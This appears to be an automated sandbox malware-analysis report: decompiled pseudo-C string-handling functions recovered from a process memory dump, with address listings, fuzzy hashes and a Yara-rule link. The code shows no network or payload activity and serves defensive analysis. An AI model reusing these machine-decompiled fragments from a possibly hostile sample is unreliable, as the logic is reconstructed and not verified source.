											_t341 = _t340 & 0x8000003f;
											__eflags = _t341;
											if(_t341 < 0) {
												_t341 = (_t341 - 0x00000001 | 0xffffffc0) + 1;
												__eflags = _t341;
											}
											__eflags = _t341;
											_t410 = _t408 + (0 | _t341 > 0x00000000) << 6;
											_push(_t410);
											_t315 = E003B1030();
											_t431 = _t431 + 4;
											_t342 =  *_a4;
											__eflags = _t342;
											if(_t342 == 0) {
												 *_t315 = 0;
											} else {
												__eflags = _t315;
												if(_t315 != 0) {
													_t250 =  *_t342;
													 *_t315 = _t250;
													__eflags = _t250;
													if(_t250 != 0) {
														__eflags = 0;
														_v60 = _t386;
														_v68 = _t293;
														_t294 = 0;
														while(1) {
															_t294 = _t294 + 1;
															_t252 =  *((char*)(_t342 + _t294 * 2 - 1));
															 *(_t315 + _t294 * 2 - 1) = _t252;
															__eflags = _t252;
															if(_t252 == 0) {
																break;
															}
															_t253 =  *((char*)(_t342 + _t294 * 2));
															 *(_t315 + _t294 * 2) = _t253;
															__eflags = _t253;
															if(_t253 != 0) {
																continue;
															}
															break;
														}
														_t386 = _v60;
														_t293 = _v68;
													}
												}
												_push(1);
												_push(_t342);
												_v68 = _t315;
												E003B10B0();
												_t315 = _v68;
												_t431 = _t431 + 8;
											}
											_t247 = _a4;
											_t247[1] = _t410;
											 *_t247 = _t315;
										} else {
											_t315 = 0;
										}
										__eflags = _t315;
										if(_t315 != 0) {
											_t343 = 0;
											while(1) {
												_t248 =  *_t293;
												_t343 = _t343 + 1;
												 *_t315 = _t248;
												__eflags = _t386;
												if(_t386 == 0) {
													goto L114;
												}
												__eflags = _t343 - _t386;
												if(_t343 == _t386) {
													 *(_t315 + 1) = 0;
												} else {
													goto L114;
												}
												goto L125;
												L114:
												__eflags = _t248;
												if(_t248 != 0) {
													_t315 = _t315 + 1;
													_t293 = _t293 + 1;
													__eflags = _t293;
													continue;
												}
												goto L125;
											}
										}
									}
								}
							} else {
								_t351 = _a4;
								_push(0x40);
								 *_t351 = 0;
								 *((intOrPtr*)(_t351 + 4)) = 0;
								_t287 = E003B1030();
								_t431 = _t431 + 4;
								_t265 =  *_a4;
								__eflags = _t265;
								if(_t265 == 0) {
									 *_t287 = 0;
								} else {
									__eflags = _t287;
									if(_t287 != 0) {
										_t352 =  *_t265;
										 *_t287 = _t352;
										__eflags = _t352;
										if(_t352 != 0) {
											_t353 = 0;
											__eflags = 0;
											while(1) {
												_t353 = _t353 + 1;
												_t317 =  *((char*)(_t265 + _t353 * 2 - 1));
												 *(_t287 + _t353 * 2 - 1) = _t317;
												__eflags = _t317;
												if(_t317 == 0) {
													goto L62;
												}
												_t318 =  *((char*)(_t265 + _t353 * 2));
												 *(_t287 + _t353 * 2) = _t318;
												__eflags = _t318;
												if(_t318 != 0) {
													continue;
												}
												goto L62;
											}
										}
									}
									L62:
									_push(1);
									_push(_t265);
									E003B10B0();
									_t431 = _t431 + 8;
								}
								L124:
								_t222 = _a4;
								 *_t222 = _t287;
								_t222[1] = 0x40;
							}
						}
					} else {
						goto L39;
					}
				}
				L125:
				_push(1);
				_push(_v56);
				E003B10B0();
				_v56 = 0;
				_v52 = 0;
				return _a4;
				goto L179;
			}

0x003c1ebe
0x003c1ec2
0x003c1ec4
0x003c1ec8
0x003c1ecf
0x003c1ed1
0x003c1ed4
0x003c1eda
0x003c1f11
0x003c1edc
0x003c1ede
0x003c1ee0
0x003c1ee3
0x003c1ee7
0x003c1ee9
0x003c1eeb
0x003c1eeb
0x003c1eec
0x003c1ef1
0x003c1ef7
0x00000000
0x00000000
0x003c1ef9
0x003c1efd
0x003c1f02
0x00000000
0x00000000
0x00000000
0x003c1f02
0x003c1eeb
0x003c1ee7
0x003c1f04
0x003c1f04
0x003c1f06
0x003c1f07
0x003c1f0c
0x003c1f0c
0x003c1f14
0x003c1f18
0x003c1f20
0x003c1f26
0x003c1f31
0x003c1f33
0x003c269a
0x003c269f
0x003c1f39
0x003c1f3b
0x003c1f3b
0x003c1f3e
0x003c1f56
0x003c1f5a
0x003c1f66
0x003c1f66
0x003c1f6c
0x003c1f6c
0x003c1f71
0x003c1f75
0x003c1f79
0x003c1f7b
0x00000000
0x00000000
0x003c1f81
0x003c1f84
0x003c1f86
0x00000000
0x003c1f88
0x003c1f88
0x003c1f8e
0x003c1fa3
0x003c1fa3
0x003c1fa8
0x003c1f90
0x003c1f90
0x003c1f90
0x003c1f94
0x00000000
0x00000000
0x003c1f9a
0x003c1f9b
0x003c1fa1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c1fa1
0x00000000
0x003c1f90
0x003c1f8e
0x00000000
0x003c1f86
0x003c2693
0x003c2696
0x00000000
0x003c1f40
0x003c1f42
0x003c1f44
0x003c1f44
0x003c1f47
0x003c1f47
0x003c1f4b
0x00000000
0x00000000
0x003c1f51
0x003c1f52
0x003c1f54
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c1f54
0x003c2678
0x003c2678
0x003c267b
0x003c2689
0x003c267d
0x003c267d
0x003c2680
0x003c2680
0x003c267b
0x003c1f3e
0x003c1fad
0x003c1fb2
0x003c1fb2
0x003c1fb5
0x003c1fb8
0x003c1fbb
0x003c1fbd
0x003c1fd2
0x003c1fd5
0x003c1fd5
0x003c1fdb
0x003c1fe3
0x003c1fe3
0x003c1fe3
0x003c1fe6
0x003c1fed
0x003c1ff0
0x003c1ff6
0x003c1ff8
0x003c1ffb
0x003c1fff
0x003c2001
0x003c2056
0x003c2003
0x003c2003
0x003c2005
0x003c2007
0x003c200a
0x003c200c
0x003c200e
0x003c2010
0x003c2014
0x003c2014
0x003c2016
0x003c201a
0x003c201d
0x003c201d
0x003c201e
0x003c2023
0x003c2027
0x003c2029
0x00000000
0x00000000
0x003c202b
0x003c202f
0x003c2032
0x003c2034
0x00000000
0x00000000
0x00000000
0x003c2034
0x003c2036
0x003c203a
0x003c203e
0x003c203e
0x003c200e
0x003c2041
0x003c2043
0x003c2044
0x003c2048
0x003c204d
0x003c2051
0x003c2051
0x003c2059
0x003c205d
0x003c1fbf
0x003c1fbf
0x003c1fbf
0x003c2065
0x003c2068
0x003c206e
0x003c1f28
0x003c1f28
0x003c1f28
0x003c2073
0x003c2077
0x003c2084
0x003c2084
0x003c2089
0x003c208b
0x003c208d
0x003c2095
0x003c2097
0x003c209d
0x003c20a1
0x003c20db
0x003c20a3
0x003c20a5
0x003c20a7
0x003c20aa
0x003c20ae
0x003c20b0
0x003c20b2
0x003c20b2
0x003c20b3
0x003c20b8
0x003c20be
0x00000000
0x00000000
0x003c20c0
0x003c20c4
0x003c20c9
0x00000000
0x00000000
0x00000000
0x003c20c9
0x003c20b2
0x003c20ae
0x003c20cb
0x003c20cb
0x003c20cd
0x003c20ce
0x003c20d3
0x003c20d3
0x00000000
0x003c2079
0x003c2079
0x003c207c
0x003c2082
0x003c20e7
0x003c20f0
0x003c20f2
0x003c20f4
0x003c2619
0x003c261e
0x003c2620
0x003c2622
0x003c262a
0x003c262c
0x003c2632
0x003c2634
0x003c2636
0x003c2670
0x003c2638
0x003c2638
0x003c263a
0x003c263c
0x003c263f
0x003c2641
0x003c2643
0x003c2645
0x003c2645
0x003c2647
0x003c2647
0x003c2648
0x003c264d
0x003c2651
0x003c2653
0x00000000
0x00000000
0x003c2655
0x003c2659
0x003c265c
0x003c265e
0x00000000
0x00000000
0x00000000
0x003c265e
0x003c2647
0x003c2643
0x003c2660
0x003c2660
0x003c2662
0x003c2663
0x003c2668
0x003c2668
0x00000000
0x003c20fa
0x003c20fa
0x003c2100
0x003c2103
0x003c2107
0x003c210b
0x003c2112
0x003c2120
0x003c2124
0x003c2128
0x003c2128
0x003c212a
0x003c212a
0x003c212c
0x003c212e
0x003c212e
0x003c212f
0x00000000
0x00000000
0x003c2131
0x003c2135
0x003c2137
0x003c213c
0x003c2142
0x003c2147
0x003c214a
0x003c214e
0x003c2152
0x003c2152
0x003c2153
0x003c2158
0x003c215b
0x003c2162
0x003c2165
0x003c216b
0x003c216e
0x003c2170
0x003c2174
0x00000000
0x00000000
0x003c217a
0x003c217d
0x00000000
0x003c217f
0x003c217f
0x003c217f
0x003c217f
0x00000000
0x003c217d
0x003c2482
0x003c2486
0x003c248a
0x003c248e
0x003c248e
0x003c2490
0x003c2492
0x003c24af
0x003c24bb
0x003c24bf
0x003c24bf
0x003c24c5
0x003c24c9
0x003c24c9
0x003c24ce
0x003c24d2
0x003c24d6
0x003c24d8
0x00000000
0x00000000
0x003c24de
0x003c24e1
0x003c24e3
0x00000000
0x003c24e5
0x003c24e5
0x003c24e9
0x003c24ed
0x003c24f3
0x00000000
0x003c24f5
0x003c24f5
0x003c24f9
0x003c24f9
0x003c24fd
0x00000000
0x00000000
0x003c2503
0x003c2504
0x003c250a
0x00000000
0x003c250c
0x003c250c
0x00000000
0x003c250c
0x00000000
0x003c250a
0x00000000
0x003c24f9
0x003c24f3
0x00000000
0x003c24e3
0x003c260a
0x003c260d
0x003c2611
0x003c2613
0x00000000
0x003c2494
0x003c2494
0x003c2498
0x003c249a
0x003c249a
0x003c249c
0x003c249c
0x003c24a0
0x00000000
0x00000000
0x003c24a6
0x003c24a7
0x003c24a9
0x00000000
0x003c24ab
0x003c24ab
0x00000000
0x003c24ab
0x00000000
0x003c24a9
0x003c25e5
0x003c25e5
0x003c25e9
0x003c25e9
0x003c25eb
0x003c2510
0x003c2510
0x00000000
0x003c25f1
0x003c25f1
0x003c2515
0x003c2515
0x003c2518
0x003c2518
0x003c251a
0x003c251e
0x003c2522
0x003c2526
0x003c252a
0x003c2531
0x003c253a
0x003c253d
0x003c2540
0x003c2546
0x003c2549
0x003c254c
0x003c254e
0x00000000
0x00000000
0x003c2552
0x003c2554
0x003c255c
0x003c255c
0x003c2562
0x003c2566
0x003c2566
0x00000000
0x003c2556
0x003c2556
0x003c2557
0x003c255a
0x00000000
0x00000000
0x00000000
0x00000000
0x003c255a
0x00000000
0x003c2554
0x003c2575
0x003c2579
0x003c257f
0x003c257f
0x003c2580
0x00000000
0x003c2586
0x003c2586
0x003c258f
0x003c2594
0x003c2597
0x003c259b
0x00000000
0x003c25a1
0x003c25a1
0x003c25a5
0x003c25a9
0x003c25a9
0x003c25aa
0x003c25ab
0x003c25b5
0x003c25bb
0x003c25be
0x003c25c0
0x00000000
0x00000000
0x003c25c2
0x003c25c5
0x00000000
0x003c25c7
0x00000000
0x003c25c7
0x00000000
0x003c25c5
0x00000000
0x003c25a9
0x003c259b
0x003c25f7
0x003c25f7
0x003c25fb
0x003c25fd
0x003c2601
0x003c2568
0x003c2568
0x003c256a
0x00000000
0x003c2570
0x00000000
0x003c2570
0x003c256a
0x003c25f1
0x003c25eb
0x00000000
0x003c25d0
0x003c25d0
0x003c25d4
0x003c25d8
0x003c25d8
0x00000000
0x003c25e0
0x00000000
0x003c2135
0x003c2183
0x003c2183
0x003c2183
0x003c2187
0x003c21e8
0x003c21ed
0x003c247b
0x003c21f3
0x003c21f7
0x003c21f7
0x003c21fa
0x003c2212
0x003c2222
0x003c2222
0x003c2228
0x003c2228
0x003c222d
0x003c2231
0x003c2235
0x003c2237
0x00000000
0x00000000
0x003c223d
0x003c2240
0x003c2242
0x00000000
0x003c2244
0x003c2244
0x003c224a
0x003c225f
0x003c225f
0x003c224c
0x003c224c
0x003c2250
0x003c2250
0x003c2254
0x00000000
0x00000000
0x003c2256
0x003c2257
0x003c225d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c225d
0x003c2250
0x003c224a
0x00000000
0x003c2242
0x003c2471
0x003c2474
0x003c21fc
0x003c21fe
0x003c2200
0x003c2204
0x003c2204
0x003c2207
0x003c2207
0x003c220b
0x00000000
0x00000000
0x003c220d
0x003c220e
0x003c2210
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c2210
0x003c2207
0x003c21fa
0x003c2264
0x003c2269
0x003c226b
0x003c226d
0x003c226f
0x003c2275
0x003c2275
0x003c2271
0x003c2271
0x003c2273
0x00000000
0x00000000
0x003c2273
0x003c2277
0x003c227e
0x003c2280
0x003c2283
0x003c2283
0x003c2287
0x003c23e1
0x003c23e1
0x003c23e8
0x003c23ea
0x003c23f0
0x003c23f2
0x003c23f4
0x003c242b
0x003c23f6
0x003c23f6
0x003c23f8
0x003c23fa
0x003c23fd
0x003c23ff
0x003c2401
0x003c2403
0x003c2403
0x003c2405
0x003c2405
0x003c2406
0x003c240b
0x003c240f
0x003c2411
0x00000000
0x00000000
0x003c2413
0x003c2417
0x003c241a
0x003c241c
0x00000000
0x00000000
0x00000000
0x003c241c
0x003c2405
0x003c2401
0x003c241e
0x003c241e
0x003c2420
0x003c2421
0x003c2426
0x003c2426
0x00000000
0x003c228d
0x003c228d
0x003c2291
0x003c2295
0x00000000
0x003c229b
0x003c229b
0x003c229d
0x003c229f
0x003c22a1
0x003c22a5
0x003c22a5
0x003c22a8
0x003c22c0
0x003c22d0
0x003c22d0
0x003c22d6
0x003c22d6
0x003c22db
0x003c22df
0x003c22e3
0x003c22e5
0x00000000
0x00000000
0x003c22eb
0x003c22ee
0x003c22f0
0x00000000
0x003c22f2
0x003c22f2
0x003c22f8
0x003c230d
0x003c230d
0x003c22fa
0x003c22fa
0x003c22fe
0x003c22fe
0x003c2302
0x00000000
0x00000000
0x003c2304
0x003c2305
0x003c230b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c230b
0x003c22fe
0x003c22f8
0x00000000
0x003c22f0
0x003c2467
0x003c246a
0x003c22aa
0x003c22ac
0x003c22ae
0x003c22b2
0x003c22b2
0x003c22b5
0x003c22b5
0x003c22b9
0x00000000
0x00000000
0x003c22bb
0x003c22bc
0x003c22be
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c22be
0x003c22b5
0x003c22a8
0x003c2312
0x003c2317
0x003c2317
0x003c231a
0x003c231d
0x003c2320
0x003c2322
0x003c2335
0x003c2338
0x003c2338
0x003c233e
0x003c2346
0x003c2346
0x003c2346
0x003c2349
0x003c2350
0x003c2353
0x003c2359
0x003c235b
0x003c2361
0x003c2363
0x003c2365
0x003c23b4
0x003c2367
0x003c2367
0x003c2369
0x003c236b
0x003c236e
0x003c2370
0x003c2372
0x003c2374
0x003c2376
0x003c237a
0x003c237d
0x003c237f
0x003c237f
0x003c2380
0x003c2385
0x003c2389
0x003c238b
0x00000000
0x00000000
0x003c238d
0x003c2391
0x003c2394
0x003c2396
0x00000000
0x00000000
0x00000000
0x003c2396
0x003c2398
0x003c239c
0x003c239c
0x003c2372
0x003c239f
0x003c23a1
0x003c23a2
0x003c23a6
0x003c23ab
0x003c23af
0x003c23af
0x003c23b7
0x003c23ba
0x003c23bd
0x003c2324
0x003c2324
0x003c2324
0x003c23bf
0x003c23c1
0x003c23c3
0x003c23c9
0x003c23c9
0x003c23cc
0x003c23cd
0x003c23cf
0x003c23d1
0x00000000
0x00000000
0x003c23d3
0x003c23d5
0x003c2461
0x00000000
0x00000000
0x00000000
0x00000000
0x003c23db
0x003c23db
0x003c23dd
0x003c23c7
0x003c23c8
0x003c23c8
0x00000000
0x003c23c8
0x00000000
0x003c23dd
0x003c23c9
0x003c23c1
0x003c2295
0x003c2189
0x003c2189
0x003c218e
0x003c2190
0x003c2192
0x003c219a
0x003c219c
0x003c21a2
0x003c21a4
0x003c21a6
0x003c21e0
0x003c21a8
0x003c21a8
0x003c21aa
0x003c21ac
0x003c21af
0x003c21b1
0x003c21b3
0x003c21b5
0x003c21b5
0x003c21b7
0x003c21b7
0x003c21b8
0x003c21bd
0x003c21c1
0x003c21c3
0x00000000
0x00000000
0x003c21c5
0x003c21c9
0x003c21cc
0x003c21ce
0x00000000
0x00000000
0x00000000
0x003c21ce
0x003c21b7
0x003c21b3
0x003c21d0
0x003c21d0
0x003c21d2
0x003c21d3
0x003c21d8
0x003c21d8
0x003c242e
0x003c242e
0x003c2431
0x003c2433
0x003c2433
0x003c2187
0x00000000
0x00000000
0x00000000
0x003c2082
0x003c243a
0x003c243a
0x003c243c
0x003c2440
0x003c244a
0x003c244e
0x003c245e
0x00000000

Strings

@, xrefs: 003C1F18

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 73f22bc3af338c376e1a23e00c2844d1b588c229ff9a55b9cec960deeffedffd
Instruction ID: 360d1390df955e5890256b0a373a667463a282b35abdbde707921977c2336447
Opcode Fuzzy Hash: 73f22bc3af338c376e1a23e00c2844d1b588c229ff9a55b9cec960deeffedffd
Instruction Fuzzy Hash: 3B323871A083928BD717CA29C490B2BBBE26FD6310F1A866DE895CB356DB35CD41C742

Uniqueness

Uniqueness Score: -1.00%

Function 003C26B0, Relevance: 1.9, Strings: 1, Instructions: 653
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E003C26B0(signed int __ecx, void* __eflags, signed int* _a4, char _a8) {
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void _v40;
				intOrPtr _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				char* _t183;
				signed int _t184;
				signed int* _t190;
				signed int _t194;
				signed int* _t195;
				signed int _t200;
				signed int _t204;
				void* _t206;
				signed int _t209;
				signed int _t212;
				signed int _t217;
				signed int* _t219;
				signed int _t220;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				signed int _t227;
				signed int _t228;
				signed int _t231;
				signed int _t232;
				signed int _t235;
				char _t236;
				signed int _t240;
				void* _t241;
				void* _t242;
				unsigned int _t247;
				signed int _t249;
				signed int _t250;
				signed int _t252;
				signed int _t254;
				signed int _t255;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				char _t260;
				char _t261;
				signed int _t262;
				signed int _t263;
				signed int _t266;
				signed int _t272;
				signed int _t273;
				signed int _t275;
				signed int _t277;
				signed int _t279;
				signed int _t280;
				void* _t281;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				void* _t285;
				signed int _t289;
				void* _t290;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				intOrPtr* _t295;
				void* _t296;
				signed int _t297;
				intOrPtr* _t298;
				signed int _t299;
				signed int _t300;
				void* _t303;
				signed int _t305;
				char _t306;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t329;
				char _t331;
				char _t332;
				char _t333;
				signed int _t335;
				unsigned int _t340;
				signed int _t342;
				intOrPtr _t344;
				intOrPtr _t346;
				signed int _t347;
				signed int _t356;
				signed int _t358;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int _t373;
				intOrPtr* _t376;
				signed int _t377;
				signed int _t383;
				signed int _t384;
				void* _t387;

				_v52 = 0;
				_t231 = __ecx;
				_v48 = 0;
				_push(0x40);
				_t335 = E003B1030();
				_t387 = (_t384 & 0xfffffff0) - 0x34 + 4;
				_t183 = _v52;
				if(_t183 == 0) {
					 *_t335 = 0;
					L8:
					_t184 = _a8;
					_v48 = 0x40;
					_v52 = _t335;
					if(_t184 != 0) {
						__eflags = _t335;
						if(_t335 == 0) {
							_t257 = 0x40;
							_t361 = 0;
							L22:
							_t20 = _t361 + 2; // 0x80000001
							_t290 = _t20;
							__eflags = _t290 - 0x40;
							_t291 =  <=  ? 0x40 : _t290;
							__eflags = _t257 - _t291;
							if(_t257 < _t291) {
								_t340 = (_t291 >> 5 >> 0x1a) + _t291 >> 6;
								_t292 = _t291 & 0x8000003f;
								__eflags = _t292;
								if(_t292 < 0) {
									_t292 = (_t292 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t292;
								}
								__eflags = _t292;
								_t342 = _t340 + (0 | _t292 > 0x00000000) << 6;
								_push(_t342);
								_t258 = E003B1030();
								_t387 = _t387 + 4;
								_t293 = _v52;
								__eflags = _t293;
								if(_t293 == 0) {
									 *_t258 = 0;
									goto L35;
								} else {
									__eflags = _t258;
									if(_t258 == 0) {
										L33:
										_push(1);
										_push(_t293);
										_v68 = _t258;
										E003B10B0();
										_t258 = _v68;
										_t387 = _t387 + 8;
										L35:
										_v48 = _t342;
										_v52 = _t258;
										L36:
										 *((char*)(_t258 + _t361)) = _a8;
										_t190 =  &_v52;
										 *((char*)(_t361 +  *_t190 + 1)) = 0;
										L37:
										_t259 =  *_t190;
										if(_t259 == 0) {
											L39:
											_t295 = _a4;
											_push(0x40);
											 *_t295 = 0;
											 *((intOrPtr*)(_t295 + 4)) = 0;
											_t232 = E003B1030();
											_t387 = _t387 + 4;
											_t194 =  *_a4;
											if(_t194 == 0) {
												 *_t232 = 0;
												L60:
												_t195 = _a4;
												 *_t195 = _t232;
												_t195[1] = 0x40;
												L61:
												_push(1);
												_push(_v52);
												E003B10B0();
												_v52 = 0;
												_v48 = 0;
												return _a4;
											}
											if(_t232 == 0) {
												L45:
												_push(1);
												_push(_t194);
												E003B10B0();
												_t387 = _t387 + 8;
												goto L60;
											}
											_t296 =  *_t194;
											 *_t232 = _t296;
											if(_t296 == 0) {
												goto L45;
											}
											_t297 = 0;
											while(1) {
												_t297 = _t297 + 1;
												_t260 =  *((char*)(_t194 + _t297 * 2 - 1));
												 *((char*)(_t232 + _t297 * 2 - 1)) = _t260;
												if(_t260 == 0) {
													goto L45;
												}
												_t261 =  *((char*)(_t194 + _t297 * 2));
												 *((char*)(_t232 + _t297 * 2)) = _t261;
												if(_t261 != 0) {
													continue;
												}
												goto L45;
											}
											goto L45;
										}
										_t344 =  *_t259;
										if(_t344 != 0) {
											_t200 =  *_t231;
											__eflags = _t200;
											if(_t200 == 0) {
												L52:
												_t298 = _a4;
												_push(0x40);
												 *_t298 = 0;
												 *((intOrPtr*)(_t298 + 4)) = 0;
												_t232 = E003B1030();
												_t387 = _t387 + 4;
												_t204 =  *_a4;
												__eflags = _t204;
												if(_t204 == 0) {
													 *_t232 = 0;
													goto L60;
												}
												__eflags = _t232;
												if(_t232 == 0) {
													L58:
													_push(1);
													_push(_t204);
													E003B10B0();
													_t387 = _t387 + 8;
													goto L60;
												}
												_t299 =  *_t204;
												 *_t232 = _t299;
												__eflags = _t299;
												if(_t299 == 0) {
													goto L58;
												}
												_t300 = 0;
												__eflags = 0;
												while(1) {
													_t300 = _t300 + 1;
													_t262 =  *((char*)(_t204 + _t300 * 2 - 1));
													 *(_t232 + _t300 * 2 - 1) = _t262;
													__eflags = _t262;
													if(_t262 == 0) {
														goto L58;
													}
													_t263 =  *((char*)(_t204 + _t300 * 2));
													 *(_t232 + _t300 * 2) = _t263;
													__eflags = _t263;
													if(_t263 != 0) {
														continue;
													}
													goto L58;
												}
												goto L58;
											}
											__eflags =  *_t200;
											if( *_t200 == 0) {
												goto L52;
											}
											_v44 = _t344;
											_t62 = _t344 - 0x41; // 0x7fffffc0
											_t363 = _t62;
											__eflags = _t363 - 0x19;
											_t63 = _t344 + 0x20; // 0x80000021
											_v64 = _t363;
											_t302 =  >  ? _t344 : _t63;
											_t234 =  >  ? _t344 : _t63;
											_t303 = 0;
											__eflags = 0;
											_v68 =  >  ? _t344 : _t63;
											_v32 = _t259;
											_t235 = _t200;
											while(1) {
												_t264 =  *_t235;
												_t66 = _t264 - 0x41; // -65
												__eflags = _t66 - 0x19;
												_t67 = _t264 + 0x20; // 0x20
												_t265 =  <=  ? _t67 :  *_t235;
												__eflags = ( <=  ? _t67 :  *_t235) - _v68;
												if(( <=  ? _t67 :  *_t235) == _v68) {
													break;
												}
												_t303 = _t303 + 1;
												_t235 = _t235 + 1;
												__eflags =  *((char*)(_t303 + _t200));
												if( *((char*)(_t303 + _t200)) != 0) {
													continue;
												}
												goto L52;
											}
											_t346 = _v44;
											_t266 = _v32;
											__eflags = _t235;
											if(_t235 == 0) {
												goto L52;
											}
											_t305 = _t266 & 0x0000000f;
											_v40 = _t346 + 0x20;
											asm("pxor xmm0, xmm0");
											_v36 = _t200;
											_t368 =  ~_t305 + 0x10;
											__eflags = _t368;
											_v44 = _t346;
											_v32 = _t266;
											do {
												_t347 = _t305;
												__eflags = _t305;
												if(_t305 == 0) {
													L69:
													_v28 = _t368;
													_t272 =  ~( ~_t347 + 0x0000000f & 0x0000000f) + 0x7fffffff;
													__eflags = _t272;
													_t369 = _v32;
													while(1) {
														asm("movdqu xmm1, [esi+edi]");
														asm("pcmpeqb xmm1, xmm0");
														asm("pmovmskb eax, xmm1");
														__eflags = _t200;
														if(_t200 != 0) {
															break;
														}
														_t347 = _t347 + 0x10;
														__eflags = _t347 - _t272;
														if(_t347 < _t272) {
															continue;
														}
														_v32 = _t369;
														_t370 = _v28;
														__eflags = _t272 - 0x7fffffff;
														if(_t272 >= 0x7fffffff) {
															L77:
															_t272 = 0x7fffffff;
															L78:
															_v56 = _t272;
															_t206 = 0;
															__eflags = 0;
															_v60 = _t305;
															_v28 = _t370;
															_t273 = _v32;
															while(1) {
																_t306 =  *((char*)(_t206 + _t235));
																_v68 = _t235;
																_t236 =  *((char*)(_t206 + _t273));
																__eflags = _t306 - 0x61 - 0x19;
																_t307 =  <=  ? _t306 - 0x20 : _t306;
																__eflags = _t236 - 0x61 - 0x19;
																_t308 =  <=  ? _t306 - 0x20 : _t306;
																_t237 =  <=  ? _t236 - 0x20 : _t236;
																_t238 =  <=  ? _t236 - 0x20 : _t236;
																__eflags = _t308 - ( <=  ? _t236 - 0x20 : _t236);
																_t235 = _v68;
																if(__eflags < 0 || __eflags > 0) {
																	break;
																}
																__eflags = _t308;
																if(_t308 == 0) {
																	L83:
																	_t209 = _v36;
																	_t305 = _v60;
																	_t368 = _v28;
																	L84:
																	__eflags = _t235;
																	if(_t235 == 0) {
																		goto L52;
																	}
																	__eflags = _t305;
																	if(_t305 == 0) {
																		L89:
																		_t356 =  ~( ~_t305 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																		__eflags = _t356;
																		while(1) {
																			asm("movdqu xmm1, [ecx+edx]");
																			asm("pcmpeqb xmm1, xmm0");
																			asm("pmovmskb esi, xmm1");
																			__eflags = _t368;
																			if(_t368 != 0) {
																				break;
																			}
																			_t305 = _t305 + 0x10;
																			__eflags = _t305 - _t356;
																			if(_t305 < _t356) {
																				continue;
																			}
																			__eflags = _t356 - 0x7fffffff;
																			if(_t356 >= 0x7fffffff) {
																				L95:
																				_t356 = 0x7fffffff;
																				L96:
																				_t277 = _t209 & 0x0000000f;
																				__eflags = _t277;
																				if(_t277 == 0) {
																					L100:
																					_t317 =  ~( ~_t277 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																					__eflags = _t317;
																					while(1) {
																						asm("movdqu xmm1, [eax+ecx]");
																						asm("pcmpeqb xmm1, xmm0");
																						asm("pmovmskb esi, xmm1");
																						__eflags = _t368;
																						if(_t368 != 0) {
																							break;
																						}
																						_t277 = _t277 + 0x10;
																						__eflags = _t277 - _t317;
																						if(_t277 < _t317) {
																							continue;
																						}
																						__eflags = _t317 - 0x7fffffff;
																						if(_t317 >= 0x7fffffff) {
																							L106:
																							_t317 = 0x7fffffff;
																							L107:
																							_t240 = _t235 - _t209 + _t356;
																							__eflags = _t240;
																							_t376 = _a4;
																							_t241 =  <=  ? 0 : _t240;
																							__eflags = _t317 - _t241;
																							 *_t376 = 0;
																							_t242 =  <  ? _t317 : _t241;
																							_t318 = _t317 - _t242;
																							 *((intOrPtr*)(_t376 + 4)) = 0;
																							_t358 = _t209 + _t242;
																							__eflags = _t358;
																							_v64 = _t358;
																							if(_t358 == 0) {
																								L142:
																								_push(0x40);
																								_t232 = E003B1030();
																								_t387 = _t387 + 4;
																								_t212 =  *_a4;
																								__eflags = _t212;
																								if(_t212 == 0) {
																									 *_t232 = 0;
																									goto L60;
																								}
																								__eflags = _t232;
																								if(_t232 == 0) {
																									L148:
																									_push(1);
																									_push(_t212);
																									E003B10B0();
																									_t387 = _t387 + 8;
																									goto L60;
																								}
																								_t319 =  *_t212;
																								 *_t232 = _t319;
																								__eflags = _t319;
																								if(_t319 == 0) {
																									goto L148;
																								}
																								_t320 = 0;
																								__eflags = 0;
																								while(1) {
																									_t320 = _t320 + 1;
																									_t279 =  *((char*)(_t212 + _t320 * 2 - 1));
																									 *(_t232 + _t320 * 2 - 1) = _t279;
																									__eflags = _t279;
																									if(_t279 == 0) {
																										goto L148;
																									}
																									_t280 =  *((char*)(_t212 + _t320 * 2));
																									 *(_t232 + _t320 * 2) = _t280;
																									__eflags = _t280;
																									if(_t280 != 0) {
																										continue;
																									}
																									goto L148;
																								}
																								goto L148;
																							}
																							__eflags =  *(_t209 + _t242);
																							if( *(_t209 + _t242) == 0) {
																								goto L142;
																							}
																							__eflags = _t318;
																							if(_t318 != 0) {
																								L121:
																								_t129 = _t318 + 1; // 0x80000000
																								_t281 = _t129;
																								__eflags = _t281 - 0x40;
																								_t282 =  <=  ? 0x40 : _t281;
																								__eflags = _t282;
																								if(_t282 > 0) {
																									_t247 = (_t282 >> 5 >> 0x1a) + _t282 >> 6;
																									_t283 = _t282 & 0x8000003f;
																									__eflags = _t283;
																									if(_t283 < 0) {
																										_t283 = (_t283 - 0x00000001 | 0xffffffc0) + 1;
																										__eflags = _t283;
																									}
																									__eflags = _t283;
																									_t249 = _t247 + (0 | _t283 > 0x00000000) << 6;
																									_push(_t249);
																									_v68 = _t318;
																									_t217 = E003B1030();
																									_t318 = _v68;
																									_t377 = _t217;
																									_t387 = _t387 + 4;
																									_t284 =  *_a4;
																									__eflags = _t284;
																									if(_t284 == 0) {
																										 *_t377 = 0;
																										goto L134;
																									} else {
																										__eflags = _t377;
																										if(_t377 == 0) {
																											L132:
																											_push(1);
																											_push(_t284);
																											_v68 = _t318;
